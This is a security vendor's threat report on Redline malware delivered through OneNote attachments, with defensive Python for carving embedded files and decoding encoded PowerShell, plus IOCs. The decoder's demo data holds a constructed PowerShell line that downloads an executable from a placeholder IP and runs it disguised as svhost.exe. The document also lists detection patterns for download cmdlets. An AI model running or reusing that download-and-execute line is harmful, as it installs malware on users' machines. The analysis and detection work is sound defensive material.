Analysts at SecneurX have found that the Redline malware is abusing Microsoft’s OneNote to spread malware. OneNote is one of the most widely used components of the Microsoft 365 package; it is still under support and receives important software updates from Microsoft. However, the frequent beta testing of the product has resulted in attackers exploiting vulnerabilities for phishing-based malware attacks. Malicious actors take advantage of the frequent feature updates to OneNote by sending spam emails with OneNote attachments: a double-click on the attachment automatically runs a script that installs malware from remote sites onto the user’s computer.
Our SecneurX analysts found in the lab a Redline sample that uses OneNote to spread and performs several evasion techniques so that antivirus software does not flag it as malicious.
Screenshots of OneNote malware spoofing a legitimate document
After the file is opened in Microsoft OneNote, it prompts the user to click the "Review Documents" image.
After clicking the "Review Documents" image, a warning message pops up displaying the text “Opening attachments will harm your computer and data”.
Behind the "Review Documents" image, multiple link files are attached, so the threat actor tries to trick the victim into clicking the image; as soon as the victim clicks it, the link file is executed.
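The lure described above works because OneNote stores each attached file (the lure image and the hidden link files) as a FileDataStoreObject inside the .one file. The following Python script is an added example written for this post; it is not SecneurX's tool. It carves those objects out of a section file using the header and footer GUIDs from Microsoft's MS-ONESTORE specification and triages what was embedded by magic bytes, so a defender can see a .lnk or PE hiding behind an image without opening the document. The sample blob at the bottom is constructed for the demo.

```python
"""Carve embedded file objects out of a OneNote (.one) section file.

FileDataStoreObject layout (MS-ONESTORE):
  guidHeader (16 bytes)  {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}
  cbLength   (8 bytes)   little-endian size of the embedded data
  unused     (4 bytes)
  reserved   (8 bytes)
  FileData   (cbLength bytes)
  guidFooter (16 bytes)  {71FBA722-0F79-4A0B-BB13-899256426B24}
"""
import struct
import uuid

HEADER_GUID = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FOOTER_GUID = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le

# Magic bytes -> type, used to triage what was hidden behind the lure image.
MAGICS = {
    b"\x4c\x00\x00\x00\x01\x14\x02\x00": "lnk",   # Windows shortcut (.lnk)
    b"MZ": "pe",                                   # PE executable
    b"%PDF": "pdf",
    b"\x89PNG": "png",
    b"\xff\xd8\xff": "jpeg",
}
RISKY_TYPES = {"lnk", "pe", "script"}


def sniff_type(data: bytes) -> str:
    """Best-effort file type from leading bytes; scripts are plain text."""
    for magic, name in MAGICS.items():
        if data.startswith(magic):
            return name
    head = data[:512].lower()
    if b"powershell" in head or b"wscript" in head or b"cmd.exe" in head:
        return "script"
    return "unknown"


def carve_embedded_files(blob: bytes):
    """Return [(offset, type, data)] for every well-formed FileDataStoreObject."""
    found = []
    pos = 0
    while True:
        pos = blob.find(HEADER_GUID, pos)
        if pos == -1:
            break
        length_off = pos + 16
        if length_off + 20 > len(blob):      # need cbLength + unused + reserved
            break
        (length,) = struct.unpack_from("<Q", blob, length_off)
        data_off = length_off + 8 + 4 + 8
        data = blob[data_off:data_off + length]
        footer = blob[data_off + length:data_off + length + 16]
        if len(data) == length and footer == FOOTER_GUID:
            found.append((pos, sniff_type(data), data))
        pos = length_off                      # continue past this header
    return found


def triage(blob: bytes):
    """Count embedded objects and list the ones a defender should look at."""
    objs = carve_embedded_files(blob)
    risky = [(off, kind) for off, kind, _ in objs if kind in RISKY_TYPES]
    return {"embedded": len(objs), "risky": risky}


def build_sample() -> bytes:
    """Constructed sample: a fake .one blob with a PNG lure and an LNK payload."""
    def obj(data: bytes) -> bytes:
        return HEADER_GUID + struct.pack("<Q", len(data)) + b"\0" * 12 + data + FOOTER_GUID
    png = b"\x89PNG\r\n\x1a\n" + b"\0" * 32            # 40 bytes
    lnk = b"\x4c\x00\x00\x00\x01\x14\x02\x00" + b"\0" * 64
    return b"\0" * 100 + obj(png) + b"\xab" * 50 + obj(lnk) + b"\0" * 20


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for off, kind, data in carve_embedded_files(blob):
        print(f"offset 0x{off:x}: {kind} ({len(data)} bytes)")
```

Run it against a real section file (`python carve.py suspect.one`) to list the embedded objects; a document whose only visible content is a picture but which carries an lnk, pe or script object is exactly the pattern described above.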
Evasion Techniques Performed
Once the user clicks the OK button, the link file runs a PowerShell command, and a Portable Executable (PE) file is downloaded to the chosen location and executed automatically.
After the file executes, a base64-encoded PowerShell command is passed.
The Start-Sleep cmdlet in PowerShell is often used to introduce delays in a script or command to avoid detection by security software.
It downloads an executable file "Opgcxhsdw.exe" and saves it as svhost.exe, mimicking the legitimate process svchost.exe. After executing and performing all of the malware's functions, data is exfiltrated from the user's PC and sent to the C2 server.
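The chain just described (base64-encoded PowerShell, a Start-Sleep delay, a download from a bare IP, and a file named svhost.exe) is visible in process-creation logs if the encoded command is decoded first. The Python below is an added example, not SecneurX's detection logic: it decodes the `-EncodedCommand` argument (UTF-16LE base64, as PowerShell expects) and scores the decoded script against those indicators. The sample command lines are constructed for the demo; the host 192.0.2.10 is a documentation-range placeholder, not the IOC from this report.

```python
"""Decode -EncodedCommand PowerShell and score the decoded body for the
indicators seen in the OneNote/Redline chain."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.I,
)

INDICATORS = {
    "start_sleep": re.compile(r"\bStart-Sleep\b", re.I),
    "download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I),
    "ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
    "svhost_lookalike": re.compile(r"\bsvhost\.exe\b", re.I),   # svchost.exe look-alike
    "start_process": re.compile(r"Start-Process|Invoke-Item", re.I),
}


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded script body, or the command line itself if not encoded."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return cmdline
    return raw.decode("utf-16-le", errors="replace")


def score(cmdline: str) -> dict:
    """Decode, then collect indicator hits; a svhost.exe name alone is enough to flag."""
    body = decode_encoded_command(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
    return {
        "decoded": body,
        "hits": hits,
        "suspicious": len(hits) >= 3 or "svhost_lookalike" in hits,
    }


def encode_for_demo(script: str) -> str:
    """Produce the same encoding PowerShell's -EncodedCommand expects (demo helper)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample script mirroring the reported chain (placeholder host, not an IOC).
SAMPLE_SCRIPT = (
    "Start-Sleep -Seconds 20; "
    "(New-Object Net.WebClient).DownloadFile('http://192.0.2.10/Opgcxhsdw.exe', "
    "\"$env:TEMP\\svhost.exe\"); Start-Process \"$env:TEMP\\svhost.exe\""
)
SAMPLE_LINES = [
    f"powershell.exe -nop -w hidden -enc {encode_for_demo(SAMPLE_SCRIPT)}",
    "powershell.exe -Command Get-Date",   # benign control line
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        result = score(line)
        print(f"suspicious={result['suspicious']} hits={result['hits']}")
```

Feed it real command lines from Sysmon Event ID 1 or Windows 4688 (with command-line auditing enabled) and review anything that scores as suspicious; decoding before matching is the step that defeats the base64 layer.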
IOC DETAILS
DOMAINS
oiartzunirratia[.]eus
IP ADDRESSES
194[.]26[.]192[.]248
URL
hxxp[:]//194[.]26[.]192[.]248/
SHA256
bf8c7c35cb5b8f47ad7fe7e89322960e105efa754360953ca854925a6b914092
What can you do to avoid being a malware victim?
As dangerous as malware is, simply being aware and staying up to date with the latest malware trends can go a long way toward securing your data and systems. Here are helpful tips on how you can defend yourself against a likely attack.
Scrutinize emails and their attachments before opening them
Be wary of emails from unverified sources. You can check by communicating directly with the purported sender to confirm whether they sent the message. To check its validity, you can use SecneurX Sandbox to verify the sanity of the email.
Avoid clicking embedded links found in unverified emails
Such social engineering tricks can lead to the download of malware. Additionally, be wary of sites that prompt you to enter a CAPTCHA code as this could be linked to a malware attack. To check its validity, you can use services like SecneurX Sandbox to verify the reputation of the site.
Back up your important files
While prevention is always better than the cure, having a backup of important files can at least lessen the potential damage done by a malware attack. While being locked out of your own system is always a bad thing, at least it's not a total disaster since you can always retrieve your important files. The 3-2-1 backup rule applies here—three backup copies of your data on two different media, and one of those copies in a separate location.
Regularly update software, programs, applications
Updating them to the latest versions can provide an added layer of protection against online threats, as some malware arrives via vulnerability exploits.
Use a layered protection suite
Doing so can detect threats before they enter your network. Security solutions like SecneurX ATP can block infectious files (executables (.exe, .run, etc.), archives (ZIP, RAR, etc.), Microsoft Office and PDF documents, JavaScript, and so on) by scanning them at the organization's points of entry (file uploads, USB file transfers, etc.).